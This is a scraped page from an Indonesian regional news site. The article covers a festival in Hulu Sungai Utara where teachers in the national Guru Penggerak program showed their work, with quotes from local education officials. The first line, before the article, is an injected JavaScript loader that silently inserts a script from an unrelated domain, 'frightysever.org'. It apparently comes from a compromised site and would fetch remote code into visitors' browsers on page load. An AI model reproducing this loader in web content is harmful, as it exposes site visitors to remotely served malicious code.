(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kabupaten Hulu Sungai Utara

Festival Hasil Panen Belajar Program Guru Penggerak di HSU


KANALKALIMANTAN.COM, AMUNTAI – Puluhan hasil karya ditampilkan dalam Festival Hasil Panen Belajar Lokakarya 7 Program Pendidikan Guru Penggerak Angkatan ke-9 yang digelar Dinas Pendidikan dan Kebudayaan (Disdikbud) Kabupaten Hulu Sungai Utara (HSU), Sabtu (27/4/2024) siang.

Kegiatan bekerjasama dengan Balai Guru Penggerak (BGP) Provinsi Kalimantan Selatan (Kalsel) dihadiri Penjabat (Pj) Bupati HSU diwakili Staf Ahli Bidang Pembangunan, Kemasyarakatan dan SDM Taberani, Kepala Disdikbud HSU Jumadi, perwakilan BGP Kalsel Mahropiono, kepala sekolah, dan guru penggerak.

Kepala Disdikbud HSU Jumadi mengatakan, program guru penggerak sebagai program strategis nasional yang dilaksanakan se Indonesia.

“Luar biasa untuk program guru penggerak ini, ini bukan cuma kita saja, akan tetapi ini dilaksanakan se Indonesia yang merupakan program strategis nasional,” tuturnya.

Baca juga: Peduli Korban Kebakaran di Cempaka, Srikandi PLN Salurkan Bantuan Perlengkapan Dapur

Program guru penggerak merupakan revolusi atau reformasi pendidikan yang sangat memberikan dampak positif bagi dunia pendidikan.

“Kita rasakan dampaknya, manfaatnya atau efeknya, di satuan pendidikan mulai TK, SD, SMP begitu juga SMA,” ungkapnya.

Perwakilan BGP Kalsel Mahropiono mengatakan, panen hasil belajar sangat penting dalam perjalanan program pendidikan calon guru penggerak. Para Calon Guru Penggerak (CGP) akan menampilkan hasil belajar dan karyanya selama mengikuti program.

“Program pendidikan calon guru penggerak dilaksanakan selama lebih dari 6 bulan yang melibatkan sumber daya dan sumber dana yang besar,” katanya.

Baca juga: Sekretariat DPRD Kapuas Ikut Meriahkan Pawai Budaya

Mahropiono mengharapkan, setiap kabupaten kota akan memiliki pemimpin-pemimpin pendidikan yang dapat mengembangkan pembelajaran yang relevan sesuai dengan perkembangan zaman dan perkembangan kodrat, kompetensi, dan karakter peserta didik.

“Saya yakin bahwa apa yang dipelajari dan dipraktikkan selama program ini membawa perubahan positif bagi diri calon guru penggerak, sekolah, dan bagi dunia pendidikan,” imbuhnya.

Sementara itu, Staf Ahli Bidang Pembangunan, Kemasyarakatan dan SDM, Taberani menyampaikan, festival panen hasil belajar program pendidikan guru penggerak merupakan sebuah pendidikan bagi guru yang berorientasi pada perubahan atau transformasi sistem pendidikan.

Baca juga: Bawaslu Kalsel Buka Seleksi Panwascam, Pengawas Lama Tak Penuhi Syarat Diganti

“Pada lokakarya 7 ini para guru penggerak membagikan berbagai aksi nyata dan program-program yang sudah dilaksanakan mengikuti pendidikan guru penggerak,” katanya.

Para calon guru penggerak diberi ruang untuk membuktikan bahwa dengan mengikuti pendidikan guru penggerak maka telah memenuhi kompetensi pemimpin pembelajaran.

“Karena telah mampu menggerakkan sebuah ekosistem pembelajaran disekolah dan mampu menjalankan program-program yang benar-benar berdampak bagi para peserta didik di sekolah,” pungkasnya. (Kanalkalimantan.com/dew)

Reporter : dew
Editor : bie


Muhammad Andi

Recent Posts

Kunker DPRD Kapuas Perkaya Referensi Raperda Bangunan Gedung

KANALKALIMANTAN.COM, KUALA KAPUAS – Panitia Khusus (Pansus) I Dewan Perwakilan Rakyat Daerah (DPRD) Kabupaten Kapuas… Read More

18 menit ago

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana

KANALKALIMANTAN.COM, BANJARBARU - Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani… Read More

3 jam ago

Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

KANALKALIMANTAN.COM, BANJARBARU - PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan… Read More

4 jam ago

Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

KANALKALIMANTAN.COM - Penyanyi senior Jhonny Iskandar meninggal dunia hari ini, Jumat (10/5/2024). Eks personel Orkes… Read More

6 jam ago

TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

KANALKALIMANTAN.COM, AMUNTAI – Membangun ulang Rumah Tidak Layak Huni (RTLH) menjadi layak huni menjadi salah… Read More

6 jam ago

Lepas Atlet ke Popda Kalsel, Ini Kata Ketua DPRD Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Target juara umum kontingen Kota Banjarbaru dalam ajang Pekan Olahraga Pelajar Daerah… Read More

7 jam ago

This website uses cookies.